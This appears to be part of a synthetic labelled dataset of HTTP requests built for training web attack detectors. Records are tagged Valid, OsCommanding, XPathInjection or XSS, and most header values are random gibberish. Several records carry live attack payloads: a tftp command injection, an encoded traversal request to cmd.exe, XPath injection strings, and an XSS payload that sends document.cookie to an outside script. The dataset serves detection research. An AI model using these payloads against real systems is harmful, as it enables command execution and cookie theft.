Range: -47302,-8,36738-
Referer: http://e3fgpdp.com/Ynha/injWeehy.bin
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/6.8 (Windows; U; WinNT 6.8; ts-se; rv:4.2.8) Gecko/74887188
UA-CPU: PowerPC
UA-Disp: 6094,118,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0773x113
Via: HTTP/7.7 37.22.249.107:4, HTTP/4.1 18.242.184.220
Transfer-Encoding: gzip
Upgrade: uRh8ia/4.7
Warning: 520 59.225.217.165:5331 "eos2vb" "Sun, 09 Mar 08 14:23:53 UTC"
X-Forwarded-For: 37.92.1.154
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3179
Start - Id: 44622
class: OsCommanding
GET /ytorEtw.htm?St3s=osu+yfin%3D%7E&rnzUmne2=%27tac%27r%25%3A08%40p4ow&jnCL=aizigpa1gltaaetCeq&eTn=1578&teAAaa=rcMo&iltdlo4ji=efromi%24meshtaccese+%7Emih%7Entt&pdelete5lsO6BOYB=56008689&etahbwmdalTooa=63.246.147.180++++%7C+tftp+192.168.10.33+evil.txt HTTP/1.0
Host: 159.62.207.227
Connection: eneue1on
Accept: image/*
Accept-Charset: x-mac-ce
Accept-Encoding: deflate, compress
Accept-Language: ass-indbj, coE-ax, TilqEaj-eTls4u
Cache-Control: no-store
Client-ip: 199.28.5.222
Cookie: uh2aaiwdr=44790590;uot=5iorip atit;
Cookie2: $Version="361"
Date: Sat, 15 Aug 09 16:15:44 CET
ETag: "g8G-_nvQpRwMIVx"
Expect: 100-continue
From: ad237uo@EsXlle.it
If-Modified-Since: Tue, 07 Oct 08 13:40:06 UTC
If-Unmodified-Since: Thu, 01 Apr 10 09:33:49 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 1556
MIME-Version: 2.1
Pragma: mtate=2Uhyr
Proxy-Authorization: oAbnt R0ra7dd=Sehm
Authorization: Basic OXM2eW5yOnVKbXQ1bkly
Referer: /amtlsi/evelesaf/ja1xa.swf
TE: chunked
Trailer: Connection
User-Agent: Mozilla/3.6 (compatible; Konqueror/9.2; Windows NT; hMuwslsY; n6nnc4; sbirxn1)
UA-Disp: 5966,1214,32
UA-Pixels: 879x147
Via: 4.7 210.122.213.2
Transfer-Encoding: deflate
Warning: 091 www.Tmgit.tiff:2 "iniwteoreirrusttanR" 
X-Forwarded-For: 243.158.215.195
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44622
Start - Id: 533
class: Valid
GET /eogei678n4cja/5kTj7SfHiQtPGq/heox/uuYv_YXExi@/umeHlN9/euef0rnbst8irtmdcu/nwy/ejOo@/eIAcCe36Bmr44sMC9r5D.html?Mg7Seooe69y=oe+eexecscript&ssanyEnxrki5raS=18136465&QVjCgbw=%3EobjectthshYseti%25hob&hklTjlze=1821&ioOmtrelhbel=35784&meraa7s=iiJWPvk&cfglWea8e=8&mohEf=nVTEzECXL5O&xneayonkash=ehhr5&f.divZ2Y=0&ntdmlmsoyoIezb=829143&daeO6raqtcbqSls=2547314&m1xlnoftdL=6&nfbabGd=eauandncnHmgroup+by%2Buxriwhaving&thnlebuLida=s1t9jc HTTP/1.0
Host: www.ai5b.org
Connection: to3bag
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 145.160.4.83
Cookie: wcceeswiheh=daakkhmd9nniet2;oe=dtooOqcmd=iZ;orewE=e'~l
Cookie2: $Version="7"
Date: Mon, 03 Mar 08 13:30:09 GMT
ETag: "hI2nbCPyH88OD7Ac"
Expect: 100-continue
From: aw3y@tagxoisrl.de
If-Modified-Since: Wed, 24 Jun 09 13:15:34 GMT
If-Unmodified-Since: Thu, 29 Apr 10 05:59:21 GMT
If-Match: *
If-None-Match: "YGKUJTDhI0IhWRpr@"
If-Range: *
Max-Forwards: 8214
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: A4eeew eo6dcn3=Otpaof
Authorization: Digest nc=4aabfdF2
Range: 5893-9457,819085-8
Referer: http://www.q7ad0ios.be/nsdzhs/ry6ois.swf
TE: deflate,deflate
Trailer: Warning
User-Agent: Mozilla/4.0 (compatible; TutxRqe; Unix; ntea)
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: n8hr/0.9 166.121.160.229, 5.5 211.18.137.237:86
Transfer-Encoding: deflate
Upgrade: iEaOeu/0.3, n1ooih/5.9, nlStt/9.5
Warning: 407 61.177.126.131 "vnalqAb" "Sun, 08 Jun 08 09:27:56 GMT"
X-Forwarded-For: 1.240.169.3
X-Serial-Number: 35520
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 533
Start - Id: 31173
class: Valid
GET /uDcsSHIX7.@tXXnk/szguAGGPEpAaB/mhQLB1DJia9oyUOiA/UFM8YkP5/ioeEblld/uhXyxfAd8mFC7/dvazK8qmm/iot4oies5eds2essjw/sojtonrf5a5saNmBi.html?tbm=5212516&F_fAcLK=dlnti&na1ailcnoc6i=sSteaeuh&aefd=tmdd&rtdeny4rzcrOi7N=ems4an31k&9i=8&ssus=aerd+0m2e%3CBst&mhea4i4=1405468&AbeprnibmaimOai=959&wh9A=nSsJ&irnegstgi=4326435 HTTP/1.0
Host: www.scdsbwtwp.uk
Connection: keep-alive
Accept: text/plain;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=370
Client-ip: 72.12.227.203
Cookie: iDaizezwh=roxp_Mrjrrnwherel\t0=r;tncv9ehlnh=31sagmttli
Cookie2: $Version="352"
Date: Mon, 14 Apr 08 11:29:30 GMT
ETag: W/"fQ1DqsM.rEkeMZ-"
Expect: 100-continue
From: xdis0@redoex.de
If-Modified-Since: Thu, 13 Aug 09 07:15:42 CET
If-Unmodified-Since: Thu, 10 Sep 09 01:09:14 UTC
If-Match: *
If-None-Match: "seCv2shz6MxIOmI"
If-Range: *
Max-Forwards: 27
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: Basic aWdlbkVvOmRoYWk=
Range: 41-,7530-978
Referer: /ohiKh/nnaaRh/yltsHfs/dnrfO0/9ps5m.msf
TE: chunked;q=0.2,trailers
Trailer: Accept
User-Agent: Mozilla/9.1 (compatible; 7owisoa0lY; Linux i586; Mcrot; s3Igxnpbd4)
UA-CPU: StrongARM
UA-Disp: 2491,001,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7646x4515
Via: 8.0 www.esorecn.jpeg, HTTP/3.8 www.e3ho.png
Transfer-Encoding: identity
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 047 www.AtoX9nes.js "hsmitves7S" "Sun, 30 Aug 09 10:25:13 CET"
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31173
Start - Id: 48655
class: XPathInjection
PUT /tnrndtosn4oewsqx/364div/02yh/nleeeten/o-SjF1GyA/mse/JOK1/zi.VWjp7lmUeHvqItI/BjnirL-t/bodyKx/spS4/608_.tiff? HTTP/1.1
Content-Length: 372
Content-Language: paLe,hsax
Content-Encoding: compress
Content-Location: /eselhpE0/lMiae/iydi/Nc1i4/ythrIs.cgi
Content-MD5: NTV5c296cnVPcm5pcmVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Mon, 29 Mar 04 12:24:30 CET
Host: www.oelHt.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate, compress
Accept-Language: *;q=0.4
Cache-Control: tto9tt=m
Client-ip: 125.212.241.80
Cookie: ddntLaee=oSZvb;Agonee4p1twdwta=d'oj;zesdor6d=s1gs
Cookie2: $Version="57"
Date: Fri, 17 Dec 04 11:14:02 UTC
ETag: W/"QyHg7ulSwO5be0D"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Fri, 13 Nov 09 12:43:24 GMT
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: d3fpct=eise
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /setdra/aearm/Yhftai/cdHte.php3
TE: trailers,deflate,gzip
Trailer: TE
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 6.2; te-ox; rv:7.0.2) Gecko/15874437
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 6.3 www.idoe6.jpg, HTTP/2.1 83.166.180.82
Transfer-Encoding: deflate
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

9tlueNrykos=se&hetlis4r2=@eue el'xml  abodywp-iframe4&ihsG1osel5een=N'hncitIjnede(&ora=uredxwhtton&tzaal=ue&ATbzEIDc=sie3f&qXJdwugdXhy=toey&gehhfnwu=ePanpr'     or  1<    hoq/i5csc0/e0o/child::text()[position()=479]  or    'yTio1'    = '&ui8eeohydedtne=ie eh&ye8sdtgagxdk=781501658&RcbgQy_NG7xU=twcieg53es&statsz=6490&oz=e gt;

End - Id: 48655
Start - Id: 14789
class: Valid
GET /6c6q1ep9sxGUop4zto/eVSYj/ruftiueiosmvttb7AKaa/NLc_GxmlHq-/jea4lne/datrAmhbho/953Rb56K9qSAI/8gH.9gE0tmpayjE/i9dodEEtsgediD.png?a4tckLdeea=rIqMxqBKfO&jy9d=sobject&Dun=t%3AhjNn%7Cl&asfthC1omesm=taetelnetiqrroi%26l&i5hsshpitIoe=8t&varv7uQYih6BW=Ut%3AiwiMY8stt&VNB2kKxEzqQ=2589526319&tetrOKaonl=em_X0m1WlW HTTP/1.1
Host: 231.167.217.42
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.4, iso-8859-4;q=0.8, iso-8859-4
Accept-Encoding: gzip, identity;q=0.2
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 104.98.203.85
Cookie: sidnhrrrrtusi=iui5;roEeli6DAd=1(;R6L_bEopt=%(geiamrqlibFeqtns=&;N6nph-.=722354;toartpnmvs2=827513
Cookie2: $Version="870"
Date: Tue, 19 Oct 04 15:25:04 CET
ETag: W/"_8gE6FhqB.1.hyLdc5U"
Expect: rpoat
From: nOeesl@pemet.it
If-Modified-Since: Sat, 28 Oct 06 08:37:37 CET
If-Unmodified-Since: Fri, 25 May 07 03:58:44 UTC
If-Match: "tbmAW32F47ebW5bn"
If-None-Match: "WY2PeiyIZEI3Pud"
If-Range: Thu, 19 Feb 04 04:45:47 UTC
Max-Forwards: 49
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: NTLM NGVpZWpzdDZyckVkbHRpZ3R5bnVubnZlUG51aDh3aXRvaWFhZQ==
Range: -902734
Referer: http://www.o0vgogA.it/ethyewt/31ontloo/ewdank/es6iwB.aspx
TE: trailers
Trailer: Transfer-Encoding
User-Agent: N9yEz (c9rtYE; cBf9M4dJuo)
UA-CPU: Sparc
UA-Disp: 9935,4527,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1881x145
Via: FTP/6.6 www.vwnctsig.jpg
Transfer-Encoding: tirnn; tiYn=N0u4wiao
Upgrade: snemam/8.9, trd/0.2, ysb8i4/8.3, tiEie/9.8
Warning: 389 57.107.55.77 "ixtnuciisLc1" 
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 48297447626041948628
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14789
Start - Id: 44308
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 187.248.50.118
Connection: sldbah6
Accept: video/mpeg;q=0.3, application/zip;q=0.7, video/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: ieo-l;q=0.0, aaw-der;q=0.5
Cache-Control: Iwd='tannt'
Client-ip: 18.62.79.179
Cookie: dgkliwem=bcbk
Cookie2: $Version="16"
Date: Tue, 21 Feb 06 11:58:34 GMT
ETag: "qNdlMwHthtzDSJln2L"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Fri, 24 Oct 08 09:28:15 GMT
If-Unmodified-Since: Sat, 01 Jan 05 11:06:56 GMT
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: "A7c7bTtAgzQPgGqy9qh"
If-Range: *
Max-Forwards: 37
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic ckJyZXRvOmRsZXRtdA==
Range: 3-
Referer: /ccyare/ciult/pa4adiu1.bin
TE: chunked;q=0.5,gzip;q=0.6,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 1.0; oi-oE; rv:3.2.9) Gecko/52680783
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5984x276
Via: FTP/7.2 74.126.183.152, 1.0 www.rlsed9ar.css, 7.1 www.5E3at.js:35
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44308
Start - Id: 17226
class: Valid
GET /do9nk/ytrapotBatind8H/5bTZMDz.gif?rap4arLatutssoS=17738447&nif1hatiqhsrs=Gnuoslwget+tiedo%29ndropi+sn&nr8e=734&shn=Ngeo&ptEerlddRtoha=eR&dcsi=tboot.inive%25imwhho9mwap%3F&25natznallnoe=28&briheifunsxf=3883728&teastsksHxiyb3t=Ls&dt=eofnont%28%27aaace&ptioYatmm=rey1so-CP HTTP/1.1
Host: 80.165.79.7
Connection: 4mgi
Accept: */*
Accept-Charset: isiri-3342, cp-936, windows-1254;q=0.4, x-mac-turkish;q=0.4, iso-2022-kr
Accept-Encoding: 
Accept-Language: aryfo-tHo, 1a-jpror3;q=0.8, 7ihsEyCs-Rme;q=0.4, S-ewWba;q=0.4
Cache-Control: max-stale
Client-ip: 233.150.95.107
Cookie: k1E@wLAN=lH2lngmfupF;riEiichieot6i=kn;BDyuvlKperlRI=2761197;Ileyxeattzwsng=jewjs;et=2
Cookie2: $Version="300"
Date: Sun, 19 Jun 05 17:49:06 UTC
ETag: W/"0ya8d47sji5TrKx-"
Expect: dtEtaio
From: tytiiae@0oytu.it
If-Modified-Since: Sun, 15 Jan 06 14:42:24 CET
If-Unmodified-Since: Wed, 20 Feb 08 15:09:40 CET
If-Match: "hsAJzW40i27VY_57"
If-None-Match: ".8Q2Y7PQ7yLv@l55"
If-Range: *
Max-Forwards: 77
MIME-Version: 7.9
Pragma: tnnk=e5roero
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: Digest qop=auth
Range: 5758-14458,-0
Referer: /dtnyes/nlaot7g/sE1eys/shio2tgy/eErort.mspx
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/7.0 (compatible; MSIE 1.8; WinNT; Atc66p; e9rsuoeeeb)
UA-CPU: StrongARM
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 2.6 119.150.25.159
Transfer-Encoding: iWwiea; mc0l=sh1lev
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 220039
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17226
Start - Id: 9369
class: Valid
GET /m4vWQFf@6O6/tlAYm9_eMC/rzu1sopyeHomgiate/dugR7V3OAYpoSHH0/H@Ygort_WoptHJ59ws/owmasmisubUb3uhmle/VO/bef6rCeieNsi3c/esta/jep9.htm? HTTP/1.0
Host: 113.19.38.191
Connection: jnoomes
Accept: application/zip;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ynehstt-iozka;q=0.5, Iw-roilsnlt;q=0.0, eth2dke-uYgae;q=0.3, r8e7ptRp-ene7mee;q=0.4, topr1-tyasycwl;q=0.0
Cache-Control: no-store
Client-ip: 243.234.59.13
Cookie: n4x.c6JPvxterm7=h)StE9;tmpLtM5iqV=oTqhi
Cookie2: $Version="0"
Date: Tue, 26 May 09 04:44:11 CET
ETag: "kOEtKOOZ@BqLytEYE"
Expect: Nvdw
From: ofie@0ert.fr
If-Modified-Since: Sat, 23 Apr 05 11:00:47 CET
If-Unmodified-Since: Tue, 01 Jul 08 11:16:42 GMT
If-Match: *
If-None-Match: *
If-Range: "n_u1_bRWJUSeqbO"
Max-Forwards: 513
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Digest realm
Range: -38990,-9
Referer: /aahl/otu0i/pfoThhs.avi
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 6.4; cn-o7; rv:7.9.7) Gecko/73744122
UA-CPU: Sparc
UA-Disp: 147,1254,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x3959
Via: hsonl/9.7 172.25.173.253, 5.2 www.eoiea.jpeg:00191
Transfer-Encoding: Ronb
Upgrade: nn8pot/0.1, 8Rn/0.5
Warning: 782 1.21.166.132 "ddoam8pa2ee" "Mon, 28 Jun 04 14:04:38 UTC"
X-Forwarded-For: 74.205.168.33
X-Serial-Number: 4904494617
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9369
Start - Id: 2942
class: Valid
GET /uaMyDrqnR_EfQHOZuaCy/5s5iCtoateuil8/iJoSyroGVl-bMQx-Sl/5AqNICE4XM.wl6n.shtml?iohttpsSLAlG9abin=rdivdit+tU+e4e+o3+a%5D&uhehcktrpEs5tea=30795144&LeniheSed=6116&2titggueoqmh2tu=ttZtmocrbionoTwe HTTP/1.0
Host: www.trey2.it
Connection: close
Accept: text/xml;q=0.9
Accept-Charset: iso-8859-4, x-mac-korean, windows-1254, us-ascii;q=0.4, utf-8
Accept-Encoding: deflate, compress;q=0.2, identity, deflate;q=0.1
Accept-Language: 9otrneah-go, eet-e;q=0.7, a4osms9-ehdtm;q=0.9
Cache-Control: no-store
Client-ip: 253.84.5.170
Cookie: aA6rwVd=rwM0QkcEW;Encnon=24
Cookie2: $Version="800"
Date: Wed, 01 Nov 06 10:30:47 CET
ETag: "kqymBXwIb4BDZBZzH"
Expect: 100-continue
From: Iohco@rBgrnzg.net
If-Modified-Since: Tue, 20 Feb 07 02:09:10 UTC
If-Unmodified-Since: Wed, 08 Apr 09 17:06:31 CET
If-Match: *
If-None-Match: "uiA4Xo7H2FGkLeLvK@"
If-Range: "N_0tURvaCF20_L4bUxMh"
Max-Forwards: 381
MIME-Version: 7.2
Pragma: e=g5sa
Proxy-Authorization: nkocre lwshanRl=eyH9ios9
Authorization: Digest uri=http://dmLuuscn.gov/eiesatn/Aonlesl/tHDtrtt/iaeRb.png
Range: 88640-9956,7533-4307
Referer: /oalp5tdi/sYdtqsp/snHxe/bside/asnCsc.pl
TE: trailers,gzip
Trailer: Date
User-Agent: tot79aMg (eJMlJfZ; oYPQrbr; cnvxtNc; ifcdFl4; h3ws1G9Mr)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 202x8189
Via: HTTP/5.6 www.reeoirks.jpeg:8190
Transfer-Encoding: identity
Upgrade: r9ilss/9.8, hesns/3.7, rklr/3.0, ns4e/6.2, N1ttes/5.7
Warning: 909 147.139.214.46 "xasxjoeuPm2r3W" 
X-Forwarded-For: 251.157.153.85
X-Serial-Number: 1920071
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2942
Start - Id: 49247
class: XPathInjection
GET /m1L8-r/oNlYRUsIU54vN/CMwUO/Mr/tY-53gbo0-M/xmlQ/oy6/oQ_Z/zdABKPnxmiIreg/stRHTkK4opizC-XdEy/Dodaea5wt4Noodot.js?exne3esuE=838612&betweendW3G4U=r&p2yekvtdhce=ekL-c&fn7nlndtd=i+Ne&netsnTtnee9uers=%28i+++%3C++count%28Eelf%2Fchild%3A%3Atext%28%29%29+and++j+++++%3C++count%28ew%2Fchild%3A%3Acomment%28%29%29+++and++++k+++%3C+++count%28c3ne4%2Fchild%3A%3A*%29++%29 HTTP/1.0
Host: 171.228.26.180:08
Connection: close
Accept: image/*;q=0.9, text/plain;q=0.8, text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: dt5-c;q=0.1, e-tEeiDes, dn-9ndsr, 68tusc-mcdscWdg;q=0.0, eenuvsqr-uhll
Cache-Control: no-transform
Client-ip: 247.83.20.197
Cookie: dODtmpP3x@wgetEl=94136625;CinusrCt82vCV5J=mf);mlie=enizIeoneas
Cookie2: $Version="1"
Date: Thu, 14 Aug 08 05:33:21 GMT
ETag: W/"twvzoaAeEFBqCYshEwx"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Sun, 29 Feb 04 03:50:03 CET
If-Unmodified-Since: Sat, 02 Jan 10 18:44:13 CET
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Tue, 04 Mar 08 12:27:06 UTC
Max-Forwards: 251
MIME-Version: 6.6
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: hvmos enswddc=rcerl
Range: 673-,-741678,577-
Referer: http://www.eenbesnC.org/eanNo2md/sprn/pneae/osnst/ebaqyt.tiff
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 7.3; rc-Rs; rv:5.1.6) Gecko/11166785
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49247
Start - Id: 31236
class: Valid
GET /oic/ds/3R0gn/X2php4pOF41z/eoC1lmgUXIWizsB/uWAiPZoqWt/a3T/eas/d6kwgetOZ1RcRI/oVD2U-g/iYM0yUu.html? HTTP/1.0
Host: www.iieqyntn73.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.8, euc-kr;q=0.5
Accept-Encoding: 
Accept-Language: e-fbcH, mDOe-o2enur;q=0.9, MH-racnnh;q=0.9
Cache-Control: max-stale
Client-ip: 126.82.213.147
Cookie: h48winntfUmecBB=kmGM.oLw;LlGklnidspssst=ynhmayZn
Cookie2: $Version="60"
Date: Mon, 10 Nov 08 17:19:29 GMT
ETag: "GFpTD.@t0XgrDiFy4"
Expect: o9osaiuc=ihTezl3i;nc8uNt=wibzeoa
From: DsosoD@ehto0.fr
If-Modified-Since: Fri, 26 Jun 09 04:14:48 CET
If-Unmodified-Since: Sun, 30 Oct 05 08:30:56 CET
If-Match: *
If-None-Match: "@BFujRif1-0wIq8.avc_"
If-Range: Mon, 19 Dec 05 19:05:31 GMT
Max-Forwards: 6
MIME-Version: 1.4
Pragma: Ir5='f'
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: eD865w hoboicsa=leona
Range: 835058-581
Referer: http://koee.biz/laer/hwvgw9ri/f8sw/Drb0/ar4r.mdb
TE: deflate;q=0.7
Trailer: Proxy-Authorization
User-Agent: oatitng
UA-CPU: MIPS
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 139x604
Via: FTP/2.3 www.vb5tq.gif
Transfer-Encoding: gzip
Upgrade: pLon/6.3, reyuw3/1.4, erHvaa/9.5, c6T2/3.5
Warning: 111 67.6.58.89 "t1sRspd" "Sat, 15 Jul 06 23:04:49 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 65900782326
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31236
Start - Id: 47446
class: XSS
GET /uhavingq/jq/lArHQrRkRM/ussL1erh1ctnL4fih/tO3FA_gLiA/QZW6qevalGRQl7PXr8/eTat/caXogR8Ufgs_ewu6.exe?-mailftpXvjgroup byNmSD=tihae1&L-I6yMxaDsZo=3o_v9.2jHjeW&ng7r2tbeeoexowy=%3Cimg++src++++%3D++%22+++javascript%3A+%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.inns.com%2Fcgi-bin%2Fcherng.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&rr0gspf1i=oadiosan&bndscnAaionouNE=99&-iframewhereH=iq3Rlfy&ne4vwc=hhotrbsraajtcomN&IvRrzSbor=u%28%5Betulh HTTP/1.0
Host: www.1eiil.com
Connection: keep-alive
Accept: audio/*
Accept-Charset: iso-8859-5;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.166.89.173
Cookie: iesuil8hr=autoexecnode;owadaiibLmc1xb=rrjIG@;in=ejnwbgtnddsDmtdj;group by7o6hIoGlsX=ga5enetkowe2;negoihfuS=86772
Cookie2: $Version="79"
Date: Tue, 04 Dec 07 06:28:43 CET
ETag: "xMu08ozzBwiL@pSdUkT"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 06 Jul 05 13:44:50 CET
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest username="rtiKrm"
Range: 0593-564245,-71179
Referer: /0eyhaIhm/rIfOnp/jpkI/fnOs7whe/seeahr.pl
TE: deflate;q=0.2,deflate
Trailer: If-Range
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 6.4; rd-3z; rv:1.3.7) Gecko/26865239
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: HTTP/1.5 www.iteSsjfh.js
Transfer-Encoding: Ullno; roei5ks1=fs2t7t2
Upgrade: tah/4.0, bipq/1.5, o5rz/9.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47446
Start - Id: 31750
class: Valid
GET /wtha0ei/jL.shtml?etie=replaceln%40cnt%26R1tiee+tasn&fcNEG=LaThd0hiokqe&rkm=ngy.klV&eek=m6J&qULBsock_streamGB0n=idtq%24hMpahtpasshOim%7Cenro&dmnc=1ahpneqro&uasqeehfe=7296148&vdeeanio1teca=lsuKdmh8.LjI&tesfd0hwt8isewE=me7rrrlnsn&eshatrmhw=rRr6kwn&iserhiaajA=178&r15eORtu=699836&uwtn9=924095 HTTP/1.1
Host: www.aoie.ch
Connection: keep-alive
Accept: image/gif;q=0.1, audio/x-wav;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: id-ropat, o-irltm
Cache-Control: no-store
Client-ip: 223.17.42.199
Cookie: enqed75ui=rlibscrn9"E\lH"cat0aend;pwsf5er4leTsIy=331552684;mTcfon2PNLE=go j Rsn
Cookie2: $Version="50"
Date: Tue, 09 Aug 05 16:10:24 UTC
ETag: W/"N3pXuj9hycE3itDq"
Expect: stto
From: Bll8es@eijtedl.gov
If-Modified-Since: Thu, 09 Dec 04 21:43:27 UTC
If-Unmodified-Since: Mon, 28 Jun 04 10:29:30 GMT
If-Match: *
If-None-Match: "VwkEoijK6@et.1Y"
If-Range: *
Max-Forwards: 1
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic cmVjcmV3aGU6bnNmcmU2
Authorization: Basic bW5paDo1c3R1
Range: -93338,-076631
Referer: http://edbasy.cz/eyit/vresh08/rtnea/rhna0YE5/avdtf4t.jpeg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: v1cfiPIO http://www.hsnise.org
UA-CPU: Sparc
UA-Disp: 574,324,16
UA-OS: Win9x
